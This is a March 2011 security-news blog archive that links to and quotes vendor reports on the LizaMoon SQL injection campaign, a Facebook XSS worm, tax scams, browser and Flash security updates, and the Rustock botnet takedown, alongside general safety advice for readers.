March 2011 - Posts

Please be careful with all website links that are presented to you in Facebook, email, or in web searchers.  Attackers are using SQL Injection attacks to seed vulnerable websites with FAKEAV and other malware.

LizaMoon Mass SQL Injection Attack continues
http://blog.trendmicro.com/lizamoon-etc-sql-injection-attack-still-on-going/
http://www.eweek.com/c/a/Security/LizaMoon-Mass-SQL-Injection-Attack-Points-to-Rogue-AV-Site-852537/

QUOTE: Websense Security Labs discovered a mass-injection campaign infecting more than 28,000 URLs, including a few Apple iTunes URLs that redirect users to a rogue AV site.  Attackers have launched a large-scale SQL injection attack that has compromised several thousand legitimate Websites, including a few catalog pages from Apple's iTunes music store.

Websense Security Labs and the Websense Threatseeker Network discovered the mass-injection campaign that compromised over 28,000 URLs, including several iTunes URLs, according to Patrik Runald, a senior manager of security research at Websense Security Labs, who posted an alert on the Security Labs blog. The mass-injection attack has been named LizaMoon after the domain hosting the attack code.

Unlike the recent SQL injection attack that affected MySQL.com and Sun.com, this mass injection is a SQL injection attack against a large volume of legitimate sites. The LizaMoon attack inserts a line of code referencing a PHP script that redirects users to another malware site.

While this AVERT warning pertains primarily to the UK, please be careful with all EMAIL messages that seem to come from the IRS or other official agencies.  Remember that the IRS does not have your email address and usually criminals want personal or bank account information.  Only work through trusted sources.

Tax Season - Beware of scams and fake messages
http://blogs.mcafee.com/mcafee-labs/u-k-tax-scams-on-the-horizon

QUOTE: As the saying goes: Death and taxes are the only constants in life. This adage can be applied to scams on the Internet as well. Every tax season we can count on scams like these to raise their heads and try to bilk users out of their identity information and hard-earned money. A few of the messaging and spam researchers at McAfee Labs sent me some samples earlier today that I would like to share.

Trend has just offered a new beta version of a standalone FAKEAV removal tool.  This new process based cleaner appears to be comprehensive. It can be downloaded free of charge and used in SAFE MODE to clean these complex infections.

Trend Micro - Creates new FAKEAV standalone removal tool
http://esupport.trendmicro.com/0/Fake-Antivirus-FakeAV-Removal-Tool.aspx

QUOTE: Fake Antivirus (FakeAV) threats have been rampant in the past few years. Various FAKEAV variants have infected millions of PCs and are continuously spreading worldwide. One reason why FAKEAV infections have become well-known to users is because they have visual payloads. Variants of the malware family often display pop-up messages telling users that their machines have been infected. This may cause panic among users, pressuring them to purchase rogue antivirus applications in the hope of resolving the issue. Users, however, should never purchase antivirus software from unknown sources.

eWeek shares this article related to IE9, noting many new improvements in functionality and security

Internet Explorer 9 - Ten Reasons to Use it
http://www.eweek.com/c/a/Enterprise-Applications/Microsoft-Internet-Explorer-9-Arrives-10-Reasons-to-Use-It-851132/

QUOTE: Microsoft has officially launched Internet Explorer 9. Although the browser’s history has been spotty, Internet Explorer 9 is the one new browser that every user should be trying. Microsoft has officially launched Internet Explorer 9. The browser, which is being touted by many reviewers already as the best version of the software the company has ever released, follows a long line of predecessors that at times won customers over and at other times failed miserably. But it's a new day for Microsoft and Internet Explorer. The time has finally come for the company to face Google's Chrome browser head-on.

1. It's fast
2. A vastly improved interface
3. It's awfully Chrome-like
4. The Pinned Sites feature is nice
5. It's much more secure
6. It's a big step up over previous versions
7. The enterprise will be happy
8. A new Microsoft?
9. Putting an end to tracking
10. It's another good reason to ditch Windows XP

Please be careful with links that might be presented to you in Facebook. Another new XSS worm is circulating that can automatically post messages with malicious links on Facebook walls of your friends and contacts. 

Facebook - New XSS Worm Allows Automatic Wall Posts
http://www.symantec.com/connect/blogs/new-xss-facebook-worm-allows-automatic-wall-posts

QUOTE: Currently a new and unpatched cross-site scripting (XSS) vulnerability in Facebook is being widely used to automatically post messages to other user’s walls. The vulnerability was used for some time in some smaller cases; however, it is now widely being used for the first time by many different groups—especially in Indonesia, where we are seeing thousands of infected messages being posted by unknowing users.

Any user who is logged into Facebook and visits a site that contains such an element will automatically post an arbitrary message to his or her wall. There is no other user interaction required, and there are no tricks involved, like clickjacking. Just visiting an infected website is enough to post a message that the attacker has chosen. Therefore it should be of no surprise that some of those messages are spreading very fast through Facebook.

Mouse Training Company - Free MS Office Training Manuals
http://www.mousetraining.co.uk/ms-office-training-manuals.html

QUOTE: We have made all our MS Office training manuals available to download for free. The files are in PDF format that will allow you Save, Print or Email to yourself.  If you are not a Mouse Training client and would like to make use of the manuals, we kindly ask that you provide a HTML link back to our site from your company website. Please use the following information for the link. The manuals are copyright protected under Wiki Commons License. This agreement will allow you to download, edit, distribute and store the manuals without limit.

Internet Private Browsing - IE, Firefox, and Chrome
http://blog.trendmicro.com/private-browsing/

QUOTE: Chrome, Firefox, and Internet Explorer released major updates this week. The timing may be a coincidence or not but there is a very interesting feature that all three browsers are developing almost at the same time—private browsing.

Each of the three approaches to private browsing has its merits:

Mozilla Firefox advocates the use of a new HTTP header that, with time, all websites should honor

Google Chrome instead uses a blacklist of websites published by Google

Microsoft Internet Explorer is similar, except that it allows for a more granular control over lists

Finally, private browsing! But how does this change my life? Well, for starters, you can now minimize the amount of targeted advertising you’re exposed to. That’s if you want to, of course. The key element is choice. The three main browsers have chosen three very different ways to implement privacy.

Some of the key security enhancements found in the new version of Firefox are listed below:

Firefox 4 Security Features
http://isc.sans.edu/diary.html?storyid=10594
https://developer.mozilla.org/en/Firefox_4_for_developers#Security

Firefox 4 - All Features (Technical writeup)
https://developer.mozilla.org/en/Firefox_4_for_developers

QUOTE: Like no other release before it, Firefox 4 includes a number of significant security features. These features are addressing attacks that are in particularly hard to avoid by developers and in which the browser is more so the victim then the server.

These attacks, Cross Site Scripting (XSS), redirects to HTTP pages from HTTPS and Clickjacking use vulnerable web applications more as a mirror to bounce attacks into the browser. The browser can provide meaningful protection against these attacks, unlike for more server centric attacks like sql injection, for which the attacker is in full control of the client.

All Apple Mac OS X users should update their systems as prompted.  There were 53 issues addressed in several components including third party software

Apple Mac OS X - Security Update 2011-001
http://blogs.pcmag.com/securitywatch/2011/03/mac_os_x_update_fixes_dozens_o.php

Mac OS X v10.6.7 and Security Update 2011-001
http://support.apple.com/kb/HT4581

QUOTE: This document describes the security content of Mac OS X v10.6.7 and Security Update 2011-001, which can be downloaded and installed via Software Update preferences, or from Apple Downloads.

We should be careful when sharing information on Facebook and other social networks. Sometimes, I see friends sharing advanced plans of a trip, vacation, or other outing. As these posts are often available to the general public, there have indeed been accounts of folks burglarized while away and criminals confusing that they discovered it via a Facebook post.

Social Network Users too friendly in sharing information publicly
http://blogs.pcmag.com/securitywatch/2011/03/survey_says_users_too_friendly.php

QUOTE: It's old news that people are way too trusting on social media sites with their personal information, but it's no less disturbing for being banal. Would you walk around on the street holding a sign displaying your birthday, home town, and other data people commonly put in their Facebook public profiles?

ID Analytics's message is that you shouldn't be one of the low-hanging fruit. They have 3 rules of thumb for protecting your identity:

1. Be careful what you share
2. Protect what you have
3. Monitor, monitor, monitor

ID Analytics - In-depth study of Privacy
http://www.idanalytics.com/news-and-events/news-releases/2011/3-22-2011.php

Below is an interesting post from the ISC reflecting an unexplained sharp decrease in port 1434 attacks by the decade old SQL Slammer worm

Port 1434: Sudden Slammer Decline?
http://isc.sans.edu/diary.html?storyid=10576

QUOTE: We're interested to know what's happening out there.  It has been observed through DShield data that Slammer traffic has had a sudden decline.  I played with the data for a while.  I could make it look like many things, such as slow and steady decline over time.  However, the most compelling story is the one where the data drops on March 9 and 10.

Below is the DShield data and graph on port 1434 for March 2011.  It's speculative at this point as to the cause of the sudden drop.  Japan's earthquake or Patch Tuesday have been kicked around.  I would be remiss if I did not mention Kevin Liston's series on Slammer Cleanup during October. We are loving the thought his great effort was a catalyst for the eradication of it. So go back and take a look at your data for us and share what you're seeing. 

New 4.0 release has just debuted and it is working well in testing as a complementary browser

Firefox 4.0 - Home Page
http://www.mozilla.com/en-US/products/download.html?product=firefox-4.0

Firefox 4.0 - Whats New
http://www.mozilla.com/en-US/firefox/features/

Firefox 4.0 - Tips and techniques
http://www.mozilla.com/en-US/firefox/tips/

Firefox 4.0 - Security
http://www.mozilla.com/en-US/firefox/features/#advancedsecurity

Please update the Adobe Flash component for your browsers as automatically prompted

Adobe Flash Player update addresses a critical security issue (CVE-2011-0609)
http://www.adobe.com/support/security/bulletins/apsb11-05.html
http://isc.sans.edu/diary/Adobe+Flash+Player+update+RSA+further+notification+and+Play+com+breach/10585

QUOTE:  A critical vulnerability has been identified in Adobe Flash Player 10.2.152.33 and earlier versions (Adobe Flash Player 10.2.154.18 and earlier versions for Chrome users) for Windows, Macintosh, Linux, and Solaris operating systems, and Adobe Flash Player 10.1.106.16 and earlier versions for Android. This vulnerability (CVE-2011-0609), as referenced in Security Advisory APSA11-01, could cause a crash and potentially allow an attacker to take control of the affected system. There are reports that this vulnerability is being exploited in the wild against Flash Player in targeted attacks via a Flash (.swf) file embedded in a Microsoft Excel (.xls) file delivered as an email attachment.

Microsoft and other security firms continue to fight spam, botnets, and other sophisticated attacks.  Recently a major complex botnet known as Rustock was taken offline reducing spam attacks and helping to improve Internet safety

Microsoft's DCU unit disrupts Rustock botnet
http://blogs.technet.com/b/microsoft_on_the_issues/archive/2011/03/18/taking-down-botnets-microsoft-and-the-rustock-botnet.aspx
http://www.zdnet.com/blog/security/rustock-botnets-operations-disrupted/8456

QUOTE: Just over a year ago, we announced that the Microsoft Digital Crimes Unit  (DCU), in cooperation with industry and academic experts, had successfully taken down the botnet Waledac in an operation known as “Operation b49”. Today, I’m happy to announce that based on the knowledge gained in that effort, we have successfully taken down a larger, more notorious and complex botnet known as Rustock. This botnet is estimated to have approximately a million infected computers operating under its control and has been known to be capable of sending billions of spam mails every day, including fake Microsoft lottery scams and offers for fake – and potentially dangerous – prescription drugs.

 

Microsoft Office XP extended support ends July 12, 2011
http://blogs.pcmag.com/securitywatch/2011/03/office_xp_to_go_off_support_in.php
http://support.microsoft.com/common/international.aspx?RDPATH=dm;en-us;lifecycle&p1=2533

QUOTE: On July 12, 2011, Microsoft Office XP will exit its "Extended Support Phase ending, among other things, the provision of security updates for it.

More Posts Next page »